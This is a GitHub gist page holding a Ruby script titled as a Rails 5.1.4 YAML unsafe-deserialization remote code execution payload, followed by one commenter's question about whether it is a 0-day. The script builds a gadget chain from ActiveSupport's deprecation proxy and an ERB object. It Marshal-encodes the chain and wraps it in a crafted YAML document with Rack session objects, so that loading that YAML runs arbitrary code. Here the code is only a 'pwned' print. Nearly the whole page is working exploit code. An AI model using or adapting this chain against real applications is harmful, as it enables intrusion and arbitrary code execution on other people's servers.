Create a gist now

Instantly share code, notes, and snippets.

@niklasb /railspwn.rb
Last active Dec 17, 2017

What would you like to do?
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
def initialize(instance, method)
@instance = instance
@method = method
@deprecator = ActiveSupport::Deprecation.new
end
end
end
end
code = <<-EOS
puts "pwned"
EOS
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")
payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
!ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
id: 'hi from espr'
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
loaded: false
PAYLOAD
puts payload

RicterZ commented Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment